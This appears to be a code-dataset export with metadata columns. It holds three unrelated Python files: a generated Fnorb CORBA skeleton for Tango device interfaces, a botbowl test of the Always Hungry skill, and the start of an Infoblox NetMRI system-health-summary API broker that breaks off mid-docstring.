# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attributes, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_attributes(self, server_request):
""" Operation: IDL:Tango/Device/write_attributes:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.write_attributes, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_ping(self, server_request):
""" Operation: IDL:Tango/Device/ping:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.ping, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_black_box(self, server_request):
""" Operation: IDL:Tango/Device/black_box:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.black_box, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_info(self, server_request):
""" Operation: IDL:Tango/Device/info:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevInfo:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.info, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_list_query(self, server_request):
""" Operation: IDL:Tango/Device/command_list_query:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfoList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.command_list_query, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_query(self, server_request):
""" Operation: IDL:Tango/Device/command_query:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfo:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_query, arguments)
# Create the reply.
server_request.results(results)
return
class Device_2_skel(Fnorb.orb.CORBA.Object_skel, Device_skel):
""" Interface: IDL:Tango/Device_2:1.0 """
_FNORB_ID = "IDL:Tango/Device_2:1.0"
def _skel_command_inout_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_inout_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_any)
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_inout_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attributes_2(self, server_request):
""" Operation: IDL:Tango/Device_2/read_attributes_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attributes_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_get_attribute_config_2(self, server_request):
""" Operation: IDL:Tango/Device_2/get_attribute_config_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_2:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.get_attribute_config_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_list_query_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_list_query_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfoList_2:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = apply(self.command_list_query_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_query_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_query_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdInfo_2:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_query_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_inout_history_2(self, server_request):
""" Operation: IDL:Tango/Device_2/command_inout_history_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdHistoryList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.command_inout_history_2, arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attribute_history_2(self, server_request):
""" Operation: IDL:Tango/Device_2/read_attribute_history_2:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevAttrHistoryList:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = apply(self.read_attribute_history_2, arguments)
# Create the reply.
server_request.results(results)
return
class Device_3_skel(Fnorb.orb.CORBA.Object_skel, Device_2_skel):
""" Interface: IDL:Tango/Device_3:1.0 """
_FNORB_ID = "IDL:Tango/Device_3:1.0"
def _skel_read_attributes_3(self, server_request):
""" Operation: IDL:Tango/Device_3/read_attributes_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.read_attributes_3(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_attributes_3(self, server_request):
""" Operation: IDL:Tango/Device_3/write_attributes_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/MultiDevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.write_attributes_3(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attribute_history_3(self, server_request):
""" Operation: IDL:Tango/Device_3/read_attribute_history_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevAttrHistoryList_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.read_attribute_history_3(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_info_3(self, server_request):
""" Operation: IDL:Tango/Device_3/info_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevInfo_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# This operation has no arguments.
arguments = ()
# Invoke the implementation.
results = self.info_3(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_get_attribute_config_3(self, server_request):
""" Operation: IDL:Tango/Device_3/get_attribute_config_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_3:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.get_attribute_config_3(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_set_attribute_config_3(self, server_request):
""" Operation: IDL:Tango/Device_3/set_attribute_config_3:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_3:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.set_attribute_config_3(*arguments)
# Create the reply.
server_request.results(results)
return
class Device_4_skel(Fnorb.orb.CORBA.Object_skel, Device_3_skel):
""" Interface: IDL:Tango/Device_4:1.0 """
_FNORB_ID = "IDL:Tango/Device_4:1.0"
def _skel_read_attribute_history_4(self, server_request):
""" Operation: IDL:Tango/Device_4/read_attribute_history_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevAttrHistory_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.read_attribute_history_4(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_inout_history_4(self, server_request):
""" Operation: IDL:Tango/Device_4/command_inout_history_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_long)
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevCmdHistory_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.command_inout_history_4(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_command_inout_4(self, server_request):
""" Operation: IDL:Tango/Device_4/command_inout_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.TC_string)
inputs.append(Fnorb.orb.CORBA.TC_any)
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.TC_any)
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.command_inout_4(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_read_attributes_4(self, server_request):
""" Operation: IDL:Tango/Device_4/read_attributes_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevVarStringArray:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevSource:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.read_attributes_4(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_attributes_4(self, server_request):
""" Operation: IDL:Tango/Device_4/write_attributes_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/MultiDevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.write_attributes_4(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_set_attribute_config_4(self, server_request):
""" Operation: IDL:Tango/Device_4/set_attribute_config_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeConfigList_3:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.set_attribute_config_4(*arguments)
# Create the reply.
server_request.results(results)
return
def _skel_write_read_attributes_4(self, server_request):
""" Operation: IDL:Tango/Device_4/write_read_attributes_4:1.0 """
# Typecodes for 'in' and 'inout' parameters.
inputs = []
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
inputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/ClntIdent:1.0"))
# Typecodes for the result, 'inout' and 'out' parameters.
outputs = []
outputs.append(Fnorb.orb.CORBA.typecode("IDL:Tango/AttributeValueList_4:1.0"))
# Typecodes for user exceptions.
exceptions = []
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/DevFailed:1.0"))
exceptions.append(Fnorb.orb.CORBA.typecode("IDL:Tango/MultiDevFailed:1.0"))
# Initialise the server request object.
server_request.initialise(inputs, outputs, exceptions)
# Unmarshal the arguments to the request.
arguments = server_request.arguments()
# Invoke the implementation.
results = self.write_read_attributes_4(*arguments)
# Create the reply.
server_request.results(results)
return
#############################################################################
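# Editor's sketch (not part of the generated file above): every _skel_*
# method follows the same five-step pattern -- declare typecodes,
# initialise the server request, unmarshal the arguments, invoke the
# implementation, and marshal the reply. Assuming only the
# server_request API shown above, the repetition could be captured by a
# hypothetical factory like this:
def make_skeleton(impl_name, inputs, outputs, exceptions, has_args=True):
    def skel(self, server_request):
        # Describe the operation's signature to the ORB.
        server_request.initialise(list(inputs), list(outputs), list(exceptions))
        # Unmarshal the arguments (no-arg operations pass an empty tuple).
        arguments = server_request.arguments() if has_args else ()
        # Invoke the implementation and marshal the reply.
        server_request.results(getattr(self, impl_name)(*arguments))
    return skel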
| 32.586481
| 87
| 0.645385
| 3,729
| 32,782
| 5.539823
| 0.027085
| 0.103834
| 0.068593
| 0.095653
| 0.975845
| 0.971246
| 0.967325
| 0.946461
| 0.936054
| 0.920757
| 0
| 0.014291
| 0.244372
| 32,782
| 1,005
| 88
| 32.618905
| 0.819668
| 0.310262
| 0
| 0.759615
| 1
| 0
| 0.099044
| 0.097548
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084135
| false
| 0
| 0.007212
| 0
| 0.194712
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 6affa7eec73b78ac98cb978c60e126ecc8e0642f
| 2,258
| py
| Python
| tests/game/test_always_hungry.py
| hadarshavit/botbowl
| eec77bdda427d5e245de6f5e136e06886183b2c7
| ["Apache-2.0"] | 7
| 2021-11-19T13:17:58.000Z
| 2022-03-23T10:32:13.000Z
| tests/game/test_always_hungry.py
| ernestvmo/botbowl
| 8b70faf615fc70eb40aa8b3519a7d2339872ea15
| ["Apache-2.0"] | 32
| 2021-11-19T15:06:55.000Z
| 2022-03-31T16:36:46.000Z
| tests/game/test_always_hungry.py
| ernestvmo/botbowl
| 8b70faf615fc70eb40aa8b3519a7d2339872ea15
| ["Apache-2.0"] | 9
| 2021-11-21T16:38:48.000Z
| 2022-03-30T14:12:36.000Z
|
from tests.util import *
import pytest
def test_failed_always_hungry_fail_escape():
game = get_game_turn()
team = game.get_agent_team(game.actor)
game.clear_board()
passer = team.players[0]
passer.role.skills = []
passer.role.ag = 2
passer.extra_skills = [Skill.THROW_TEAM_MATE, Skill.ALWAYS_HUNGRY]
game.put(passer, Square(1, 1))
right_stuff = team.players[1]
right_stuff.role.skills = []
right_stuff.extra_skills = [Skill.RIGHT_STUFF]
right_stuff_position = Square(2, 1)
game.put(right_stuff, right_stuff_position)
game.step(Action(ActionType.START_PASS, player=passer))
D6.fix(1) # Hungry
D6.fix(1) # Escape
game.step(Action(ActionType.PICKUP_TEAM_MATE, player=passer, position=right_stuff.position))
game.step(Action(ActionType.DONT_USE_REROLL))
game.step(Action(ActionType.DONT_USE_REROLL))
assert game.has_report_of_type(OutcomeType.FAILED_ESCAPE_BEING_EATEN)
assert game.has_report_of_type(OutcomeType.EATEN_DURING_ALWAYS_HUNGRY)
assert CasualtyEffect.DEAD in right_stuff.state.injuries_gained
assert not game.has_report_of_type(OutcomeType.TURNOVER)
assert passer.state.used
def test_failed_always_hungry_escaped():
game = get_game_turn()
team = game.get_agent_team(game.actor)
game.clear_board()
passer = team.players[0]
passer.role.skills = []
passer.role.ag = 2
passer.extra_skills = [Skill.THROW_TEAM_MATE, Skill.ALWAYS_HUNGRY]
game.put(passer, Square(1, 1))
right_stuff = team.players[1]
right_stuff.role.skills = []
right_stuff.extra_skills = [Skill.RIGHT_STUFF]
right_stuff_position = Square(2, 1)
game.put(right_stuff, right_stuff_position)
game.step(Action(ActionType.START_PASS, player=passer))
D6.fix(1) # Hungry
D6.fix(2) # Escape
D6.fix(6) # Land
game.step(Action(ActionType.PICKUP_TEAM_MATE, player=passer, position=right_stuff.position))
game.step(Action(ActionType.DONT_USE_REROLL))
assert game.has_report_of_type(OutcomeType.SUCCESSFUL_ESCAPE_BEING_EATEN)
assert game.has_report_of_type(OutcomeType.SUCCESSFUL_LAND)
assert not game.has_report_of_type(OutcomeType.TURNOVER)
assert passer.state.used
assert not right_stuff.state.used
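# Editor's sketch: the two tests above repeat the same board setup; a
# hypothetical helper (not present in tests.util) could hold the shared
# steps, leaving each test with only its dice fixes and assertions:
def setup_always_hungry_pass(game):
    # Clear the board and place a Throw Team-Mate passer next to a
    # Right Stuff team-mate, exactly as in the tests above.
    team = game.get_agent_team(game.actor)
    game.clear_board()
    passer = team.players[0]
    passer.role.skills = []
    passer.role.ag = 2
    passer.extra_skills = [Skill.THROW_TEAM_MATE, Skill.ALWAYS_HUNGRY]
    game.put(passer, Square(1, 1))
    right_stuff = team.players[1]
    right_stuff.role.skills = []
    right_stuff.extra_skills = [Skill.RIGHT_STUFF]
    game.put(right_stuff, Square(2, 1))
    return passer, right_stuff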
| 39.614035
| 96
| 0.74535
| 325
| 2,258
| 4.895385
| 0.218462
| 0.113136
| 0.061596
| 0.105594
| 0.881835
| 0.850409
| 0.850409
| 0.850409
| 0.837838
| 0.837838
| 0
| 0.012513
| 0.150576
| 2,258
| 56
| 97
| 40.321429
| 0.816997
| 0.014172
| 0
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192308
| 1
| 0.038462
| false
| 0.307692
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 8
| ed04d8b5fb490a74d198e21b7563fe486ea80548
| 48,186
| py
| Python
| infoblox_netmri/api/broker/v3_6_0/system_health_summary_broker.py
| IngmarVG-IB/infoblox-netmri
| b0c725fd64aee1890d83917d911b89236207e564
| ["Apache-2.0"] | null | null | null
| infoblox_netmri/api/broker/v3_6_0/system_health_summary_broker.py
| IngmarVG-IB/infoblox-netmri
| b0c725fd64aee1890d83917d911b89236207e564
| ["Apache-2.0"] | null | null | null
| infoblox_netmri/api/broker/v3_6_0/system_health_summary_broker.py
| IngmarVG-IB/infoblox-netmri
| b0c725fd64aee1890d83917d911b89236207e564
| ["Apache-2.0"] | null | null | null
|
from ..broker import Broker
class SystemHealthSummaryBroker(Broker):
controller = "system_health_summaries"
def show(self, **kwargs):
"""Shows the details for the specified system health summary.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The internal NetMRI identifier of the system health summary.
:type id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return system_health_summary: The system health summary identified by the specified id.
:rtype system_health_summary: SystemHealthSummary
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
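# Editor's sketch: a minimal wrapper over show() as documented above;
# the `include` input pulls the data_source association into the output.
# The helper name is hypothetical, not part of this broker:
def get_summary_with_source(broker, summary_id):
    """Fetch one system health summary together with its data source."""
    return broker.show(id=summary_id, include=["data_source"])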
def index(self, **kwargs):
"""Lists the available system health summaries. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.9
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: No description is available for id.
:type id: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of system health summary methods. The listed methods will be called on each system health summary returned and included in the output. Available methods are: data_source.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` id
:param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, datasource_id, timestamp, category, diagnostic, status, entry_type, visibility, message_code, message, silenceable_ind, silenced_ind, updated_at, subcategory.
